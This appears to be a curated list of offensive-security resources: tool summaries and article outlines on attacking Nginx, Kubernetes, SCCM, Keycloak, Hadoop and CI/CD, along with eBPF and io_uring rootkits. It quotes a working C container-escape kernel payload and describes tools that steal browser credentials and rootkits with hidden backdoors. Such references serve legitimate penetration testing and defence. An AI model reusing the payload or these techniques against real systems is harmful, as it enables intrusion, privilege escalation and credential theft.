Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities
Install using Docker
git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
sudo docker build -t nginxpwner:latest .
sudo docker run -it nginxpwner:latest /bin/bash
It actually checks for
* Gets the Nginx version, looks up its possible exploits using searchsploit and reports whether the version is outdated
* Throws a wordlist specific to Nginx at the target via gobuster
* Checks if it is vulnerable to CRLF injection via the common misconfiguration of using $uri in redirects
* Checks for CRLF injection in all of the paths provided
* Checks if the PURGE HTTP method is available from the outside
* Checks for the variable leakage misconfiguration
etc.
darkPulse
darkPulse is a shellcode packer written in Go that is used to create various shellcode loaders
Netfetch
Scan your Kubernetes clusters to identify unprotected workloads and map your existing network policies
* Visualize network policies and pods in an interactive network map
* Scan the cluster to identify pods without network policies
* Create default deny network policies where this is missing
* Get suggestions for network policies based on existing workloads
Link
SCCMHunter
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain
It contains modules such as
* admin
* dpapi
* http
* mssql
* smb
Link
GitHub
GitHub - garrettfoster13/sccmhunter: SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain.
Keycloak pentest
Articles
Part 1 - Link
* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration / SAML Descriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration
Part 2 - Link
Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* address
* phone
Tools
Keycloak security scanner - Link
* Starting with Keycloak 17.0+, the /auth route must be omitted from the URL (/realms/realm_name/)
Csacyber
Pentesting Keycloak Part 1: Identifying Misconfiguration Using Risk Management Tools
Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.
HackBrowserData is a command-line tool for decrypting and exporting browser data, including:
* passwords
* history
* cookies
* bookmarks
* download history
* localStorage
* extensions
It supports the most popular browsers on the market and runs on Windows, macOS and Linux
Link
GitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux).
Kubernetes security fundamentals
Introduction
* Complications of talking about Kubernetes security
* Managed and unmanaged Kubernetes distributions
* Areas of discussion
API Security
* Kubernetes components and ports
- Unmanaged Kubernetes
- Managed Kubernetes
* Securing Kubernetes APIs
Authentication
* Kubernetes authentication principles
- Internal Kubernetes authentication methods
- Static token authentication
- Bootstrap tokens
- X.509 client certificates
- Service account tokens
* External authentication methods
- OpenID Connect (OIDC)
- Webhook token authentication
- Authenticating proxy
- Impersonating proxy
* Authentication for other Kubernetes components
- Kubelet
- Controller manager and scheduler
- Kube-proxy
- Etcd
Authorization
* Kubernetes authorization principles
* Kubernetes authorization modules
- AlwaysAllow and AlwaysDeny
- Node Authorizer
- ABAC
- RBAC
- Webhook
* Authorization for other Kubernetes components
- Kubelet
- Scheduler and Controller Manager
Admission Control
* Admission control overview
- Internal admission controllers
- External admission controllers
* Risks of implementing external admission control
- Using admission control for pod security
Networking
* Network trust zones
* Introduction to CNI
* Managing network access in Kubernetes
* Securing the cluster network
* Conclusion
* Appendix - Setting up a demonstration environment
Datadoghq
Kubernetes security fundamentals: Introduction
Introducing a new series of posts on Kubernetes security fundamentals with a discussion of some of the complexities of Kubernetes security.
Hadoop pentest
Hadoop Attack Library - A collection of pentest tools and resources targeting Hadoop environments
This repository is composed of two kinds of information and is organised accordingly:
* Tools, Techniques and Procedures to attack a Hadoop environment
* Key vulnerabilities on Hadoop components (Hadoop Common, HDFS, YARN etc.)
* Key vulnerabilities in third-party components often used in Hadoop environments
Apache Hadoop Pentesting - Exploits notes with the following sections
* Authenticate using Keytab
* Impersonate Another Hadoop Service
* HDFS Command Cheat Sheet
* RCE
GitHub
GitHub - wavestone-cdt/hadoop-attack-library: A collection of pentest tools and resources targeting Hadoop environments
Nmap-did-what
Nmap-did-what is a Grafana Docker container and a Python script that parses Nmap XML output into an SQLite database. The SQLite database is used as a datasource within Grafana to view the Nmap scan details in a dashboard.
The project consists of two main components:
* A Python script that parses Nmap XML output and stores the data in an SQLite database.
* A Grafana Docker container with a pre-configured dashboard for visualizing the Nmap scan data.
Link
Container escape using kernel exploitation & Seccomp bypass via manipulating the container’s namespaces
Exploit from the article:

void get_root_payload(void) {
    ((_commit_creds)(COMMIT_CREDS))(
        ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
    );
    // -------- NAMESPACE DOCKER EXPLOIT --------
    // copy nsproxy from init_nsproxy to pid 1 of the container
    unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);
    // now, do the magic.... !!!! Simple black magic doesn't work on current process!!!!
    ((_switch_task_namespaces)(SWITCH_TASK_NS))((void *)g, (void *)INIT_NSPROXY);
    // prepare the two namespace FDs by opening the respective files
    long fd = ((_do_sys_open)(DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
    ((_sys_setns)(SYS_SETNS))(fd, 0);
    fd = ((_do_sys_open)(DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
    ((_sys_setns)(SYS_SETNS))(fd, 0);
}

The above code can be used in any future privilege escalation vulnerability found in the Linux kernel to escape a containerized environment.
Link
Cyberark
The Route to Root: Container Escape Using Kernel Exploitation
Follow an imaginary cyber attacker as she tries to escape a container using kernel exploitation -- with and without root access.
IngressNightmare
The vulnerability exists at the stage where the Admission Controller validates an incoming Ingress object: an Nginx configuration is generated from it and checked with nginx -t, which leads to:
CVE-2025-24514 - auth-url Annotation Injection
CVE-2025-1097 - auth-tls-match-cn Annotation Injection
CVE-2025-1098 - mirror UID Injection
CVE-2025-1974 - NGINX Configuration Code Execution
Detect exposed Ingress NGINX Admission Controller - Nuclei Template
Create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP - kube-review
PoC
Full WIZ research - IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX
wiz.io
CVE-2025-1974: The IngressNightmare in Kubernetes | Wiz Blog
Wiz Research uncovered RCE vulnerabilities (CVE-2025-1097, 1098, 24514, 1974) in Ingress NGINX for Kubernetes allowing cluster-wide secret access.
Gitlab CI/CD
Attacking GitLab CI/CD via Shared Runners
* A Standard Poisoned Pipeline
* Shared Docker-in-Docker Runners and Privileged Containers
* The Shared Instance-Level Runner
* Attacking Docker-in-Docker Shared Runners
* Remediation - Hardening the CI/CD Infra
* Shell Executors
Link
Pulse Security
OMGCICD - Attacking GitLab CI/CD via Shared Runners
This article discusses compromising shared CI/CD runner infrastructure, and how an attacker can escalate their privileges from basic source-repository access to compromising the environments the wider system is deploying.
eBPF
eBPF: A new frontier for malware
* What is eBPF?
* Lifetime of an eBPF program
* kprobes, uprobes, and tracepoints
* eXpress Data Path (XDP)
* Traffic Control (TC)
* Prevention
* Detection
Bad-bpf - A collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29
ebpfkit - rootkit powered by eBPF
With Friends Like eBPF, Who Needs Enemies? - Black Hat USA 2021 research
Red Canary
eBPF: A new frontier for malware | Red Canary
Extended Berkeley Packet Filter (eBPF) is beginning to transform the Linux malware landscape. Here's what defenders should look out for.
I got interested in the eBPF topic, so as an experiment I decided to build this project: https://github.com/cotsom/eBPF-rootkit/
* Backdoor triggered by sending a passphrase in a TCP packet
* Hiding a process's PID (this functionality is taken from bad-bpf, but the loader is rewritten in Go)
On PID hiding there are good articles that walk through the example used:
eBPF program creation in practice – PID concealment (Part 1)
eBPF in practice – PID concealment (Part 2)
GitHub
GitHub - cotsom/eBPF-rootkit: eBPF backdoor with PID hiding
Post-exploiting a compromised etcd – Full control over the Kubernetes cluster and its nodes
* Persistence
* Resources hiding
* Bypassing AdmissionControllers
Curing
Curing is a PoC of a rootkit that uses io_uring to perform different tasks without using any syscalls:
* Read files
* Write files
* Create symbolic links
* C2 server communication
Linux io_uring problems - Link
GitHub
GitHub - armosec/curing: io_uring based rootkit
GRPCUI
A command-line tool that lets you interact with gRPC servers via a browser.
If the server has reflection enabled, grpcui will automatically detect the available methods.
# If you have the .proto file
grpcui -proto service.proto -plaintext grpc-address:50051
# If the service has reflection enabled
grpcui -plaintext grpc-address:50051
Useful for
* Testing via burp
* Using sqlmap & the like
* Supports proxying via proxychains
GitHub
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
eBPF rootkit reverse
* Introduction to eBPF
* How are eBPF programs built and loaded?
* Reversing eBPF rootkit
Link
ARMO
Reverse Engineering eBPF Programs: A Deep Dive
Explore how eBPF technology works by reverse engineering eBPF-based programs. Learn about its internals, benefits, and applications in modern computing